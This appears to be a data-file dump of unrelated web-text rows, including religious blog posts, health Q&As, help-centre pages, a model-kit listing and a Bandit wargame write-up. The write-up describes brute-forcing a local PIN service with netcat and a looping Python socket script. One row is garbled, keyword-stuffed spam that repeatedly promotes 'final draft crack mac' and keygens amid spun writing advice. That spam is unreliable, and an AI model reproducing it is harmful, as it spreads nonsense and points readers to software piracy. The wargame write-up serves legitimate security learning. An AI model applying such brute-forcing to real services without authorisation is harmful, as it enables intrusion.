id
stringlengths
50
55
text
stringlengths
54
694k
global_01_local_0_shard_00002368_processed.jsonl/40620
Types of Abuse: • Isolation and constant surveillance • Threats to the victim and/or family (for example children in the home country) • Exploitation of fears associated with unclear prospect of being granted a work permit in Germany • Rape, physical and emotional abuse • Dispensing drugs, alcohol and medication • Exploitation of the victim's lack of knowledge of the German legal system and threats (for example, by pretending to have a good connection to the police) • Massiv mental cohersion (especially in victims from African cultures through Juju oaths and Voodoo rituals)
global_01_local_0_shard_00002368_processed.jsonl/40629
Line 4Line 4 Copyic/close/grey600play_circle_outline - material How GMO help us to feed our ever growing population Submitted by: Sneh Shah Expert response from Community Manager Moderator for Friday, 04/05/2018 13:57 Thank you for your question. This question has been previously been answered in this response. A snippet of is included below: “Jim Gaffney, PhD, Strategy Lead of Biotech Affairs and Regulatory at DuPont Pioneer says this: “In short, yes, genetically modified (GM) crops are one tool with great potential for helping feed the growing population. The challenge is not just one of increased productivity though, but also of improving prosperity for millions of smallholder farmers and environmental stewardship and sustainability. That's a tall order and we’ll need all the tools available to us.” Read his full response here. Tamika Sims, PhD, Director of Food Technology Communications at the International Food Information Council (IFIC), says this: To feed the world, we need to reduce food waste, while increasing the yield of food in a sustainable way on land already dedicated to agriculture—and GMOs can help! Genetically modified (GM) foods provide a nutritional and safe alternate to conventionally produced foods.” Read the full response here. We hope this answers your question, if you have any additional questions, please ask!
global_01_local_0_shard_00002368_processed.jsonl/40645
Tag Archives: sin Is it I, Lord? But it’s more than that. That needs some unpacking. The grace of God in Jesus is still sufficient for us. Filed under Uncategorized As A Man Thinketh Do our doctrines motivate our behavior does our behavior motivate our doctrines? This question has come up on two discussion groups I deal with.  Interestingly, and perhaps in answer to the question, the doctrines presented in these discussion groups are dramatically different.  The two groups are as close to opposites as we will find within the Christian community. In one group, we are told that all are saved and there is no hell and nothing will keep anyone from Heaven.  So, the folks who teach that are free to do whatever they want without spiritual consequence.  In the other group, we are told that God is angry with evil and that only a few will get through the gates and that that anyone who disagrees is already condemned.  So the folks who teach there believe they are superior to everyone else and do pretty much whatever they want without worrying about spiritual consequence.  Since the folks in both groups seek to minimize and manipulate earthly consequences, they are almost completely unaccountable.  Yes, it is just that bizarre. The only difference between the groups, other than their basic beliefs, is their willingness to expose their behavior.  The first group, the one that rejects any negative consequence, is loud and in your face.  The second, the one that teaches others to behave under law and condemnation, has to hide the excesses.  The first doesn’t care about exposure; while the second avoids it.  Otherwise, their behavior is much the same. Behavior proceeds out of our thinking, according to the Scripture.  So does our doctrine.  What we do comes from what we think.  But what we believe also comes from what we think.  If I think I ought to be able to do something I will find ways to do it and justify it. So big name preachers mishandle money and women.  And grace teachers get drunk and cuss.  And church leaders abuse their wives and gossip about others.  They do it because they think they should be able to do it.  And they create doctrine that allows it. Both behavior and doctrine come out of our thinking.  When our thinking is perverse, both our behavior and our doctrine will be perverse.  We are called to “renew” our minds, our thinking, according to the thinking of Christ.  We are to have His mind and His heart. The Christian life is not a certain standard of behavior.  It is also not a certain set of doctrines.  The Christian life is a relationship with a Person.  It is an exchange, if you will, of His life for ours, of His quality for ours.  He loves us and we love Him.  We walk with Him and He talks with us and we begin to think like Him. Is there right behavior?  Is there right doctrine?  Of course, but neither matter unless they come out of our relationship with Jesus. Filed under Relationship Grace 101 1 Comment Filed under Grace 101 Grace Plus? That’s the message of grace! 1 Comment Filed under grace, Grace 101, Grace definition, Legalism An Incongruent Life Grace 101 And if when I died fully I cannot say, And changed into the corpse-thing I am to-day, Yet is it that, though whiling The time somehow In walking, talking, smiling, I live not now. – Thomas Hardy, Dead Man Walking Although it is a popular phrase today, used by some even to mean people about to be fired or let go from their job, “dead men walking” seems gruesome to me.  But it is a particularly accurate description of the existence Adam and Eve had after the Fall.  In fact, it is a description of anyone’s life apart from Christ. Obviously we won’t get far trying to convince those without Jesus that they are dead.  But they already know that something is off, something is not the way it should be.  The life/existence of the lost person is incongruent. Congruency is agreement or harmony.  It is a description of things working together to perform or be identified as a unified whole.  But the lost person, apart from life in Christ, is not whole.  How much of our art and music has come from the deep longing of the soul?  How much sin has come from the search for fulfillment?  How many good works have been done in the search to bring wholeness to human life? But, apart from life in Christ, we are the walking dead.  Our first parents were unable to pass on to us the life they shared with God in the Garden.  That communion that fulfilled their lives, that brought them into harmony with God and each other, was lost.  The grief they felt has reverberated throughout humanity to this day. And we use hard words to describe those who remain apart from Jesus.  They are lost; they walk in darkness; they are under condemnation and shame; they are in sin and in Adam; they are doomed to hell.  Words of pain and struggle and grief. This is the death that God warned them about.  It was their choice, but this death was the consequence of their sin.  It was more than separation from God.  It was separation from life.  And there was no going back. No matter how hard or what they tried, they could never regain that life.  It could never again be theirs.  Good works, striving, even religion couldn’t bring it back.  It was gone forever. And the only answer was new life from outside themselves.  Their only hope was in something that wasn’t theirs. Leave a comment Filed under grace, Grace 101 What Happened? Grace 101 If God made us to live in relationship with Him through the very life He placed in us, what happened?  How could that have changed? The subject of sin is broad and deep and complicated, I suppose.  So let’s just assume the fact of sin, the action and attitude that Adam and Eve had when they stepped outside the will of God.  Remember that it was their choice to move into a territory or state of being apart from God.  God had told them something and they chose to disobey.  In fact, He told them very clearly that they would die. But did they die?  They didn’t fall down and stop moving.  They didn’t stop breathing.  They don’t seem to have died at all.  So we reinterpret the simple words of God.  What He meant, we say, was that they would die eventually.  It took Adam 900 years to die, according to the Scriptures.  900 years later, the words of God happened just as He said.  Really? No.  God told them something very specific.  He said, “Of every tree of the garden you may freely eat; but of the tree of the knowledge of good and evil you shall not eat, for in the day that you eat of it you shall surely die.”  In the day.  What day?  A day lasting 900 years?  I don’t think so.  I think it was in the same day, at the same time, the very moment.  When Adam ate of the forbidden fruit, the spiritual life of God that connected Adam with the Lord died.  The light went out. Since both Adam and Eve ate of the fruit, stepped outside the will of God, they both lost communion with Him.  The life died in both of them.  And they were no longer able to pass that spiritual life on to their children.  What was supposed to be a wonderful uniting of all people to the heart of God didn’t happen. The physical life continued, of course.  What we see after the Garden is a testimony to the love and mercy of God.  He did not destroy the people.  He did not end humanity as a failed attempt at love.  He had a wonderful plan in place that would welcome people back to a real and lasting relationship with Him.  And He would use that plan to show us what love was all about. But in the meantime, the only relationship any human could have with God was as two separate beings seeking to relate through the walls of sin and unbelief.  We were the “walking dead.”  The heart of God was something foreign and the love of God was so difficult to see.  All we knew, apart from Him, was that something was seriously wrong.  And many of us simply forgot even that. So the life that was supposed to be in us, supposed to define us, was lost and we were lost.  Adam and Eve, our ancestors, entered into that realm called, “Apart from God,” and humanity has been there ever since.  The purpose of our existence, the reason for humanity, was lost on that day. But God had a plan. 1 Comment Filed under Grace 101, Relationship, Theology and mystery Because He Loved Them “If you love something, set it free. If it comes back, it was, and always will be yours. If it never returns, it was never yours to begin with.”  Sherrilyn Kenyon, Unleash the Night Many of us were brought up with the idea that God controls all things.  We talk about His plan and His sovereignty and His will and we just know that He gets everything He wants.  So when God says that He wants all people to be saved, to come to knowledge of the joy and peace found in Jesus, He must get what He wants.  Right? But when we open our eyes to the real world, it is plain to see that God doesn’t always get what He wants.  He doesn’t want us to sin, but we do.  He wants us to love one another, and that is rare.  He wanted Israel to follow the Law and to stay close to Him, but they didn’t.  This is the Almighty God!  Why doesn’t He get what He wants? Because of love. Listen to God’s own description of love: 1 Corinthians 13:4-7 (NKJV) Love “does not seek its own.”  That means it does not demand its own way.  Love allows the other person to be a real person.  Love recognizes that the other person is a separate identity and love values that identity.  Love does not demand others to simply be reflections or toys.  Love lets others be who they are. And God loves us.  He loves all people. So God doesn’t force anyone.  From the very beginning, God set Adam and Eve in a beautiful garden where all their needs would be provided forever.  They walked with Him and lived in a wonderful relationship with Him.  But they were free.  They were intelligent and able to make moral choices.  He allowed them to grow and create and live. And, when the time came, they chose.  They chose something God did not want.  He knew it would happen, but we never say that He wanted it.  We like to say that they turned their backs on Him, but the truth is that they simply chose to do something He warned them against. They did it their way. Because they were free. Because He loved them. He let them go because they wanted to go.  He warned them.  He grieved when they did it.  But He knew they would.  Because they were free. And they lost so much.  He knew they would and He told them they would.  But He didn’t stop them.  He already had a plan in place.  Because He loved them. God made every person to live in relationship with Him because He loved each one.  Yet, because of that love, He let each one go his or her own way.  They would suffer apart from Him because He never made them to be alone.  He would call to them, long for them, and always be ready to welcome them; but they would have to choose Him. So He set in motion an amazing plan. Leave a comment Filed under Grace 101, Relationship, Theology and mystery
global_01_local_0_shard_00002368_processed.jsonl/40652
1939 chopped 2 door Chevy body Blvd. Resin $ 45.00 1/24 scale resin 1939 Chevy 2 dr chopped custom. Use Monogram 1939 coupe as donor to complete engine and undercarriage. May need some sanding and prep work, as most resin kits do. Comes with full proper hood/with bird hood ornament, and bench seat to complete interior. Sorry, skirts not included fenders and grill not included. More from this collection
global_01_local_0_shard_00002368_processed.jsonl/40656
Questions? I’m happy to answer any questions or comments you might have. Please send me a message, and I will get back to you as soon as possible. Frequently Asked Questions Q) Do you sell physical copies of your products? A) Yes! Some of my products are available printed and/or ready-to-use at my Etsy Shop. %d bloggers like this:
global_01_local_0_shard_00002368_processed.jsonl/40667
Recap of Last LessonCreated a little BASH script to cause a cron job Bandit Level 25 Brute force the server listening on port 30002 using the password for Bandit 24. Intel Given • A daemon or service is listening on port 30002 • Sending the password for Bandit 24 plus a pin will cause the service to send us the correct password • There are 10000 possible pins. 0-10000 How to First off a disclaimer: I am not a programmer. I don’t really have an official title, but I can be loosely called an incident handler/vulnerability re-mediator. I chose python as the language that I’m going to be learning and you can read why here. My code may not be the best, most elegant or feature rich. If you see anything you would change or I could do better please let me know! Shout out to RST for the assist in helping with a little newline issue. We know there is a service running on the local machine on port 30002. If we were following the hacker methodology, we could nmap it try to discover the service and gain a bit more intel. Because we’re playing a game and we’re given some intel I’m going to assume this is a custom script being run on this port and I’m going to skip doing a service scan. This list will be our general steps for this challenge/script. 1. Connect to the service 2. Send a password + pin combo (Script and automate this process) 3. Evaluate the results For Step 1, I like to use netcat to connect to services. Netcat is one of the primary tools for connecting to things in the hacker toolbox, often times if I reach for my Red Team Field Manual its because I’m looking for a netcat switch. First off, lets connect. nc invokes the netcat command, localhost is the local machine and 30002 is the port we’re connecting to. We are given a banner and more intel on the format of input. It wants the password plus the pincode on one line plus a space in-between. So lets try that and I see what happens. When we input the password as requested we’re given an error message. This is also important because when we create our script we don’t know what the service or daemon will do with a correct answer, only an incorrect one. So we can use that error message to evaluate a condition in our script if we want. Spoiler: I didn’t, and you’ll see why. We could continue manually entering these pins if we want but that would take us a really long time. So lets use the computer to do the manual labor for us an automate this process. You can use any scripting language you like, perl, bash, python. I originally solved it in bash and then python just to learn more about python. A bit of setup is required, you can only write to the /tmp/ directory when logged into bandit and you can’t view the files. So you just need to create your own directory, mine is /tmp/r00ty for the sake of this exercise. I’ll post the solution and then walk you through the script. I had a few objectives. I knew I could pass commands to bash using the python library but that would basically be me just making a python/bash hybrid solution. I wanted this script to do everything from the connection to the brute force in python. First I import the socket library, socket is required to make network connections. Then I initialize the pin variable with a 0 and set my password variable. Next I establish an object  called ‘s’ which sets up my socket. I use the socket object and have it connect to ‘localhost’ on port ‘30002’ and then using s.recv(1024) accept the ‘banner’. So far this just established the connection to the service. Now we enter a while loop to brute force the password. The while loop simply prints the pin it will attempt. Next, s.sendall() sends the password and pin through the socket. Note the ‘\n’ as the last argument to the function, this is required because it tells the service that you’re done entering a line, without it the script will hang. Finally we capture the data returned from the server, print it and increase the pin by one. Then it starts all over. Now if I were to make this script more feature rich I could evaluate a condition to determine if the return from the service had “Wrong!” in it, if so continue the script. If not, stop and say ‘Pin Found!’. Luckily for me that was not needed because the service resets the connection when the correct pin is presented and thus the script stops. Note: It’s been pointed out that my while loop is an infinity loop. I know, I could have just used a for loop and that’s a better method of doing it. I was planning on putting in error handling + conditionals but it wasn’t necessary. You could have gone about solving this problem in several ways with several different scripts. In fact your python script will probably look very different than mine (probably better too).  We discussed how to connect to an unknown service and script a little pin brute force script. I hope that I have also showed you how python can be used to help automate tasks when doing some of these challenges on your own. Another example of a more feature rich script can be found here.
global_01_local_0_shard_00002368_processed.jsonl/40669
Tuesday, October 2, 2007 Lois Maxwell, R.I.P. By Mitchell Or Miss Moneypenny, if you prefer. That’s how most of us would know her, as M’s extremely efficient secretary, forever flirting with 007, in that lighthearted way that so many use to mask the seriousness inside. Bond probably looked at her as a younger sister (or older sister perhaps; the Bonds kept getting younger as she stayed the same); a friend, a trifle, but nothing to be taken seriously. Or did he? After all, the only woman who every really captured Bond’s heart was Diana Rigg. (By the way, if you get the chance be sure to catch the episode of The Avengers that features Lois Maxwell in a non-Bond role, playing opposite Diana Rigg’s predecessor, Honor Blackman – who played Pussy Galore in the Bond movie Goldfinger. Got all that?) Now, where was I? Oh yes, my point was that Moneypenny was smart, sensible, mature, and far more attractive than many women, including some of the cheap starlets with whom Bond invariably found himself involved. Not unlike Diana Rigg, in a sense. So perhaps there would have been time for Bond and Moneypenny after all; at least until the producers deemed Lois Maxwell to be too old for the ever-younger Bonds, and hired another of those starlets. And was I the only one to be shocked to find that Lois Maxwell last played Moneypenny 22 years ago? She was 58 that last time she appeared in a Bond movie, and for a moment I thought the numbers didn’t add up; surely it couldn’t have been that long ago. But it was. Thanks to the timelessness of film however, it was never “that long ago;” it will always be today. (After all, to recall a Bond film, Tomorrow Never Dies,) And if it is true, as another Bond film insisted, that You Only Live Twice, then we should all be so lucky to be remembered doubly, as both Lois Maxwell and her portrayal of Miss Moneypenny will attest. No comments: Post a Comment Remember: Think Before Commenting. Related Posts Plugin for WordPress, Blogger...
global_01_local_0_shard_00002368_processed.jsonl/40687
1. Help Center 2. How does home maintenance with Divvy Homes work? Who is responsible for maintenance? Divvy covers the cost of any maintenance or repairs required to ensure the home is safe and habitable - for example, roofing, HVAC, foundation, electrical systems, etc. As the tenant, though, you are responsible for identifying issues that may arise, and arranging for a contractor to complete such repairs. Prior to the contractor actually performing such repairs, you must send to Divvy the contractor's name, phone number and cost estimate for such repairs, for us to approve. Divvy will pay the contractor upon satisfactory completion of the repairs. Divvy does not cover any cosmetic repairs, including but not limited to painting, carpeting, landscaping, or appliances. We also will not pay for repairs required as a result of any intentional or negligent damage, destruction, or misuse of the home by you, your guests or your visitors. You can reach out to Divvy directly in the event of any time-sensitive or critical maintenance issues (for example, an active leak or faulty HVAC), and you should immediately contact your local utility provider in the event of a dangerous or harmful issues (for example, a gas leak or downed power lines).
global_01_local_0_shard_00002368_processed.jsonl/40688
Our webmail interface makes it easy to access your email account from any device via a web browser. Start by visiting our webmail interface: https://webmail.hoa.email. Log in On the login screen, you will need to enter your login credentials. This includes the full email address of the account you are trying to access (eg. [email protected]) followed by the password designated for that specific email account. Then, click "Sign in." Having trouble logging in? Here are a few items to check over if you are unable to log in using the steps above: • Be sure you're using the full email address in the "Email Address" field. This will look like [email protected]. • Make sure you're using the correct password. Learn how to reset a forgotten password. • Be sure you've visited the correct URL. This URL can be found at the bottom of the "Email Accounts" section in the Admin Control Panel. When you click on this link, you should see a login page that looks like the screenshot provided above. Did this answer your question?
global_01_local_0_shard_00002368_processed.jsonl/40689
The following options are available when you select Index of Tables as the index type. للوصول لهذا الأمر... Choose Insert - Table of Contents and Index - Table of Contents, Index or Bibliography - Type tab (when Index of Tables is the selected type) Type and Title Specify the type and title of the index. Select the type of index that you want to insert. The options available on this tab depend on the index type that you select. If the cursor is in an index when you choose the Insert - Table of Contents and Index - Table of Contents, Index or Bibliography, you can then edit that index. Enter a title for the selected index. Protected against manual changes Prevents the contents of the index from being changed. Manual changes that you make to an index are lost when the index is refreshed. If you want the cursor to scroll through a protected area, choose - LibreOffice Writer - Formatting Aids, and then select the Enable cursor check box in the Protected Areas section. Create index for Select whether to create the index for the document or for the current chapter. Create from Specify the information to be combined to form an index. Creates index entries from object captions. To add a caption to an object, select the object, and then choose Insert - Caption. Select the caption category that you want to use for the index entries. Select the part of the caption that you want to use for index entries. The following table lists the caption options that can be selected, based on the caption text "Illustration 24: The Sun", where "Illustration 24" was automatically generated, and "The Sun" was added by the user. Selections in the Display list box Entry in the Index Reference Text Illustration 24: The Sun Category and Number Illustration 24 The Sun If you select "Caption Text", the punctuation and the space at the beginning of the caption does not appear in the index entry. Object names Creates index entries from object names. You can view object names in the Navigator, for example, and change them in the context menu. Please support us!
global_01_local_0_shard_00002368_processed.jsonl/40692
1. Home 2. Docs 3. Facebook Auto Publish (WP2Social Auto Publish) 4. User Guide 5. Manage Authorization Manage Authorization Note: This section is applicable only if you are using the smapsolutions app and the account once authorized. In this section we can see all the authorizations done for the smapsolutions app. manage authorization We can see all the authorizations or the wp installation authorization. We can delete the authorization if you want. Was this article helpful to you? Yes 1 No
global_01_local_0_shard_00002368_processed.jsonl/40694
The enum optimization If you are programming C# (yes, and even C/C++) you are most probably familar with the enum construction.  Instead of using “magic-numbers” in your code, you increase the readability and maintainability by using enums.  E.g.:   The enumeration above is declared without values to hold different types of business entities, as normally you don’t care[…]
global_01_local_0_shard_00002368_processed.jsonl/40697
HermanIqbal6 blog final draft crack mac Posted by [email protected] on An article rich with keywords is actually definitely an excellent strategy draw understand what we are of attention one in order to their domain. There does exist a comfortable balance from the keyword-stuffed article and natural writing. Creating the latter will give web surfers reason to go to your content and possibly provide backlinks to content material from quite website. Allot time - Use sufficient time research the paper. End up being important believe about and re-think on the information that you have gathered. Refer to multiple resources, so in which you do not loose on time and can utilize it to the very best of your need. By final draft crack mac after midnight, fresh coffee in hand, Red was back off the mark. He switched on the CB hoping that a caravan will coming up behind my husband. He was in luck. Wallace understood that arrived on the scene the associated with Origin of Species that changed if you have ever of science forever. It was the execution of that idea in the way that captured the interest of everyone who see clearly. Suggestions: (a) use an alphabetical system for your books, for example, your very first book will be A, the second, B, and such like. While doing that, make a bibliography list by using those mail. Another option is also included with numbers. Then, as you are copying and pasting them into your paper, are able to put the letter from sentence or paragraph. Can be a really good cross-reference between sources and paper, making your bibliography referencing incredibly easier. After your do the referencing switching your letter system to your proper footnotes, and are able to create a final draft, you remove the letters from your paper. The truth is, stealing your work would become more trouble than it's perfectly worth. Stealing a writers work means risking a legal battle that is going to take time and money to compete. It also means risking a loss of revenue of reputation, which could be pretty injurious. Mistake #1: You mention to people that you're writing a book, and they become instantly fascinated. "You are? That's terrific. What's it all over?" final draft keygen ask. Is it possible to answer that question a single sentence, or will you talk your listeners in a very stupor as explain your subject? Of course, knowing to tell anyone who'll listen related to your book-it's content, its purpose, its potential for becoming a best insurer. Resist the recommend. final draft key make is chatting about their books, rather than writing her. Capture your topic in some sentence: "My book can be." Then, stop talking, and go home and note. As a reminder, your best option might be to utilize the skills of a seasoned debt relief company. Offer a good track record of helping their clients regain associated with their money situation. Even still, at the rear of importance of goal setting and opt-in list of properly managing circumstances. Categories: None Post a Comment Oops, you forgot something. Already a member? Sign In
global_01_local_0_shard_00002368_processed.jsonl/40699
Do Herpes Symptoms Fluctuate? Dear Dr. Tom: I have read that the symptoms of herpes (headaches, etc.) are the worst during the first occurrence, but my recurrences sometimes are barely noticeable, and then some of them I feel like I’ve been hit by a truck (aches, fatigue, headache, etc.). Are they supposed to fluctuate like that? Feeling like a hypochondriac. Dr. Tom’s Response: Dear Feeling Like a Hypochondriac: For many years I have known of a humorous expression passed around among my microbiologist colleagues: "The bugs haven’t read the books". Yours obviously haven’t, because otherwise they should know you expect them to behave consistently and more gently. You are experiencing the vagaries of a most peculiar infectious agent. None of us have any explanation for this, only to expect it to happen. Do not feel like a hypochondriac; it is the nature of the critter. • Top 10 Herpes Facts • Featured Article • Other Infections
global_01_local_0_shard_00002368_processed.jsonl/40702
If you want to become an Authority in something that’s the same as the guy with the giant monster truck with the loud stereo blasting Vanilla Ice with no muffler. You’re compensating for something and need to be tolerated while you’re in the general area. If you aspire to be an authority in something you basically are an insecure megalomaniac that has no substance. You want people to be regressed when they talk to you and demand them to give you a blow job. And they will. It’s called student loans. Authority is basically totally worthless. All authority should be silenced. If you’re suggestions of absolute structure are only good because they are contingent on your job title then your opinion is worthless. If you can’t facilitate someone to have an ah ha moment on their own without fear of some kind then you’re not an authority you’re part of the problem and need a refund on the narrative that you bought when you were a kid. Stop listening to Authority. They don’t know you exist and don’t care. They are only there because people think authority has information you don’t. They are all form and zero content. They’re like Donald Trump. Leave a Reply You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s
global_01_local_0_shard_00002368_processed.jsonl/40706
I founded His Precious Gem in September 2018  after I realized that I knew of very few millennial Christians who openly share their faith. There are many blogs and vlogs out there that do not glorify God so I decided to step up to the challenge and fill this gap by sharing my experiences. I look forward to growing and learning as I share on this blog my experiences and what the Lord puts in my heart. My prayer is that the Lord will use this platform to reach out to a lot of millennials out there and just encourage you all that true joy only comes from the Lord and that He is so amazing, He loves us so much! And like the prodigal son He is waiting for us to come home. His word in Matthew 11:28 says “Come unto me, all ye that labour and are heavy laden, and I will give you rest…” Here’s to growing together in our faith! Up ↑
global_01_local_0_shard_00002368_processed.jsonl/40737
Saturday, July 02, 2005 Is It His Name Or What He Drinks Before A Show ? While the Mothership was in space dock, Lembit Optik (Lib Dem, Venus) popped into the Beeb and took the opportunity to help Johnnie Walker set a new standard for non-confrontational interviewing. All I’ll say about Cadet Optik’s performance is to note that at one point he accused the US of ‘environmental terrorism’ – is that like flying an airliner into Lake Windemere ? We never found out – this, and many other pearlers, was spewed forth by Cadet Optik with nary a challenge from JW. Come to think of it, this non-interview was almost a textbook example of what’s wrong with the Beeb. There’s the trainwreck view of economics: Is it too simplistic, or is it true to say that a proportion of the wealth of the West is dependent on these [Third World] countries remaining poor ? How could you persuade a French farmer to give up his subsidies ? How about option C: neither true nor simplistic, just moronic. Far be it from me to complain about people bashing either the French or the CAP, but what’s with this ? It’s the pizza box back again – the belief that if have too many slices some dude in Africa is going to be left munching cardboard. The idea that Africa might be poor because it doesn’t generate enough wealth never even enters these people’s heads. Nope – it's The Man making off with their rightful slices. Then there’s the strange view of the constitution: Up to 2 Million people marched to prevent war against Iraq and it made not a jot of difference, politicians took no notice whatsoever. I’ll let this idiocy speak for itself, as I’m enjoying my new found genius status as befits a bloke with an IQ of ‘up to’ 350. How do we make it that we have votes that actually mean something ? In other words, proportional representation, which should mean more parties will have to work together ? Never mind the bias, or the rather quaint view of PR, why exactly would we want these weasels to work together ? They already do that once a year when it’s pay review time: say no more. Personally, I’d rather they stay as they are now, like rats in a sack, rather than give us 365 days of the year with them demonstrating the kind of broad vision and commitment to public service that they demonstrate on pay day. Now, no one’s saying the BBC shouldn’t give air time to the fruiter ends of the spectrum, or that interviews necessarily have to be confrontational, or even that there isn’t a place for the opinionated presenter, except that these are all things that, in other contexts, the BBC has strongly come out against (see here for example).That’s the bias – that there are different rules for Libs as compared with those on the right. No comments:
global_01_local_0_shard_00002368_processed.jsonl/40741
HTTP Redirect without 3xx HTTP status code Secure Redirect Redirect to a url without being tracked! Paste the link and get your secure link! Redirect URL without being tracked. Remove HTTP referer. NOT return the HTTP code 3xx. Don't let bots track the link. Keep your links safe! With just two easy steps... 1. Fill in your URL: 2. Get your anonymous URL: Copyright © No posts. No posts. Powered by Blogger.
global_01_local_0_shard_00002368_processed.jsonl/40755
Couldn't find what you looking for? No need for unpleasantness Although this issue does not fall into the category of those that a person in question needs to feel awkward about, and even extremely ashamed of, a great number of women, nonetheless, does feel pangs of uneasiness and do so quite often and to a great extent. One known fact is that, as much as ten million people in America (the majority of which is comprised of women) are having a rather hard time in bringing their bladder under proper control. But it is often not enough for those people, more specifically women, to seek a medical help in relieving and learning the techniques that will enable them to take the entire matter into their own hands. Problems revealed Those most frequent bladder related issues include such as overactive bladder syndrome, leaking urine and urinary incontinence. And there may lie at the basis of these conditions numerous reasons for their occurrence, some of which are direct side effects of childbirth, as well as natural aging process. But thanks to the discovery of certain techniques and methods, in the area of gynecology and urology, the number of women benefiting directly from this is quite large, to say the least. Most frequently occurringproblems Urine leakage. The greatest number of women falls under the influence of incontinence at one point in their lives. To make things even harder for women, the urine leakage occurs even when they are doing their physical exercises, coughing, sneezing and also laughing hard. Those having most problems are the pregnant women and those women who had reached the menopause.Urge incontinence is a specific type of incontinence, which is induced by an extremely forceful and unexpected urge to urinate. Given the fact that this particular type occurs as a direct consequence of the inability to keep everything in control, it can be provoked and initiated by diabetes induced damage of the nerves, various infections, stroke and numerous other similar conditions and illnesses.Mixed incontinence refers to the combination of the above mentioned urge incontinence and intense stress. Also the occurrence of an unexpected and uncontrollable urge to urinate can also bepossible.Functionalincontinence is a particular type of incontinence that occurs as a direct consequence of movement/mobility related issues and difficulties.Overactive bladder is a condition that involves extremely frequent urination, i.e. eight or even more visits to the toilette. Most common causes of these problems include such as nerve disease, stroke, diabetes and multiple sclerosis, as well as Parkinson’s disease, aging, various illnesses, and injuries. When it comes to the treatment, proven to be the most effective techniques are such as pelvic muscle rehabilitation, regular physical exercising, biofeedback, vaginal weight training, pelvic floor electrical stimulation and various behavioral therapies. Your thoughts on this User avatar Guest
global_01_local_0_shard_00002368_processed.jsonl/40764
Properties of waves Properties of waves In this guide, we are going to concentrate on two important types of waves: transverse and longitudinal, and the ways of describing them using the properties of waves. Types of waves Though several types of waves exist in physics, there is a special category of waves known as mechanical waves which are waves formed by a disturbance such as a vibrating object. There are two types of mechanical waves: 1. Transverse waves 2. Longitudinal waves Transverse and longitudinal waves Transverse waves are mechanical waves in which the vibrations are at right angles to the direction in which the wave is travelling. Here are some examples of transverse waves: • Light waves are transverse waves. • All kinds of electromagnetic waves (such as radio waves, microwaves, X-rays etc.) are transverse waves. • Even the waves of water are transverse waves! Longitudinal waves are mechanical waves where the direction of the waves is forwards and backwards, along the direction in which the wave is travelling. Sound waves are examples of longitudinal waves. All longitudinal waves show areas of compression and rarefaction which help them spread easily. Describing waves Having studied transverse and longitudinal waves, we are now going to focus on some important terms that can be used to describe waves: Wavelength and amplitude The wavelength  of a wave is the distance from one crest of the wave to the next (or the distance from one trough of the wave to the next). As wavelength is distance, it is measured in meters (m). (You may have noticed the symbol  used as the symbol of wavelength. This is the Greek letter known as ‘lambda’) The amplitude A of a wave is the maximum height of a crest of a wave.  Like wavelength, amplitude is also measured in meters (m). For sound, the greater its amplitude, the louder it is. Common misconceptions Please note that the amplitude is measured from the undisturbed level, to the height of the crest. Candidates often make mistakes and consider the amplitude to be the distance from the trough of a wave, up to its crest! Be careful! Frequency and period The frequency f of a wave is the number of waves produced each second. Frequency is also defined as the number of crests produced per second. Frequency is measured in hertz (Hz). One Hertz is one complete wave; a wave with a frequency of 10Hz means that there are 10 waves produced per second. The period T of a wave is the time taken for one complete wave to pass a point. A period of a wave is measured in seconds (s). Frequency and periods are related to each other; waves with shorter periods tend to have higher frequencies. This brings us to the equations that relate frequency and period of waves: Wave speed The speed  of a wave is the rate at which the crest or any point on the wave covers a particular distance in a second. Speed, frequency and wavelength We can write an equation that relates: 1. The speed of a wave 2. The frequency of a wave 3. The wavelength of a wave This equation is also known as the wave equation: Finally, here are some of the properties of waves: Reflection of waves Waves are reflected when they strike a surface just as light is reflected all around. Here the angle that a wave makes against the normal (at 900) is the angle of incidence i. The angle that a wave makes while it is being reflected is the angle of reflection r. The law of reflection states that the ‘angle of incidence = angle of reflection’ which is absolutely true when it comes to all types of waves (May it be transverse or longitudinal) Refraction of waves Refraction occurs when the speed of light changes. The effect of refraction can also be observed in waves. The reason why refraction occurs in waves is because of the changes in wave speed due to a change in material. Note: Waves of water tend to travel more slowly in shallow water and faster in deep. Diffraction of waves When a wave of water passes through a gap in a barrier, an interesting natural phenomenon can be observed: When ripples of water pass through a gap in a barrier, they spread out into the space beyond. This phenomenon is called as diffraction. Note: The effect of diffraction is the largest when the gap between the barrier and the wavelength of the ripples is equal. ***This is the end of this guide. Hope you enjoyed it! Thanks for using! We hope you will give us a chance to serve you again! Thank you!***  Leave a comment
global_01_local_0_shard_00002368_processed.jsonl/40772
Dynasties and Christian Colleges Why do conservative Christian colleges pass from father to son?  That’s the question asked recently by Mark Oppenheimer in the New York Times.  He looks at the dynastic succession of school presidents at schools such as Liberty and Bob Jones.  But does Oppenheimer give short shrift to the history of the question? It’s an intriguing line of inquiry.  Leading schools such as Liberty University, Oral Roberts, and Bob Jones University all have histories of passing leadership from father to son.  Sometimes this has worked well, Oppenheimer points out, but sometimes it has not. Why have conservative schools constructed these sorts of dynasties?  Oppenheimer explains it as a sort of sectarian necessity.  Colleges such as Liberty and BJU started as outgrowths of the founders’ evangelistic efforts.  Those efforts included the creation of a sub-cultural identity.  Only a limited circle of true believers could be trusted to carry on the legacy.  As a result, Oppenheimer argues, It would thus be a small band of insiders, versed in the particulars of the founder’s message, who would even be eligible to carry it into the future. That may be why, for example, the presidential search committee at Bob Jones University, while not seeking another Jones descendant, has stated “a preference for a B.J.U. graduate.” Oppenheimer wisely consulted scholars such as Matthew Sutton and D. Michael Lindsay.  Lindsay warned not to read too much into this dynastic tradition at evangelical schools.  After all, the cases Oppenheimer cites make up only a handful, among hundreds of colleges.  And they are only at the “newer colleges.” I have the greatest respect for President Lindsay as a scholar, school leader, and all-around nice guy.  [Full disclosure: Lindsay and I served together as postdoctoral fellows with the National Academy of Education.]  But in this case, Lindsay whitewashes the connection between legacy and Christian colleges.  And unfortunately, Oppenheimer lacks either the word count or the historical knowledge to push Lindsay on the issue.  It’s a shame. After all, in contrast to Lindsay’s assertion, dynasties in evangelical colleges go way back.  And there seems to be some tentative connections we could suggest between the drive for orthodoxy and the family connections.  For example, the flagship evangelical school, Wheaton College, passed from father to son in 1882.  And though this might make today’s evangelicals uncomfortable, Charles Blanchard, son of founder Jonathan Blanchard, originally took the school in an explicitly fundamentalist direction.  To be fair, as I argue in my 1920s book, the meanings of “fundamentalism” as Blanchard the Younger understood them in the 1920s were significantly different than they became after Blanchard’s death. There can be no mistake, 